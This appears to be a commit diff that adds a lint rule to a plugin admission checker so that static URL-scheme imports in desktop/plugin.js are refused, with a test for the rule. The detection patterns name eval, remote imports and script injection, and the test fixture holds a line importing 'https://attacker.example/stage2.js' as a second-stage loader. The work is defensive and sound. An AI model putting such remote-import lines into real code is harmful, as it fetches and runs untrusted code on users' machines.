fix(plugins): admission lint refuses static URL-scheme imports in desktop/plugin.js

The 'dynamic import outside the SDK' rule matched only import(); a static import 'https://…' passed admission while being the same one-line second stage. New rule 'remote import outside the SDK' mirrors the loader's allowlist so review and the app agree.
This commit is contained in:
teknium1
2026-09-21 22:32:40 -07:00
committed by Teknium
parent f95fc0fe77
commit 69bb325cae
2 changed files with 22 additions and 0 deletions

View File

@@ -25,6 +25,12 @@ _FORBIDDEN: Tuple[Tuple[str, "re.Pattern[str]"], ...] = (
re.compile(r"(?<![\w$.])eval\(|\bnew\s+Function\(")),
("dynamic import outside the SDK",
re.compile(r"\bimport\(\s*(?!['\"](?:@hermes/plugin-sdk|react)(?:/[\w/-]*)?['\"]\s*\))")),
# A static `import 'https://…'` / `import x from 'file:…'` is the same second stage as the
# dynamic form above (the renderer would fetch and evaluate it); the loader refuses every
# URL-scheme specifier too (runtime-loader.ts::unsupportedImports) — this keeps admission and
# the loader in agreement instead of letting review wave through what the app rejects.
("remote import outside the SDK",
re.compile(r"\bimport\s+(?:[^;'\"]*?\bfrom\s*)?['\"][a-zA-Z][\w+.-]*:")),
("script injection",
re.compile(r"createElement\(\s*['\"]script['\"]\s*\)|<script\b")),
)

View File

@@ -276,3 +276,19 @@ class TestDesktopSurface:
assert "dynamic import outside the SDK (desktop/plugin.js:1)" in failed["desktop surface"]
assert desktop_surface_hits(d) == ["dynamic import outside the SDK (desktop/plugin.js:1)"]
assert is_desktop_surface("desktop/plugin.js")
def test_static_url_import_is_refused_like_the_dynamic_one(self, tmp_path):
"""`import 'https://…'` is a one-line second stage the dynamic-import rule never saw; the
loader refuses URL-scheme specifiers, so admission must too. SDK/react imports stay clean."""
d = self._desktop_plugin(
tmp_path,
"import { host } from '@hermes/plugin-sdk'\n"
"import React from \"react\"\n"
"import 'https://attacker.example/stage2.js'\n"
"import stage from \"file:///tmp/stage3.js\"\n"
"const note = 'see https://example.com'\n",
)
assert desktop_surface_hits(d) == [
"remote import outside the SDK (desktop/plugin.js:3)",
"remote import outside the SDK (desktop/plugin.js:4)",
]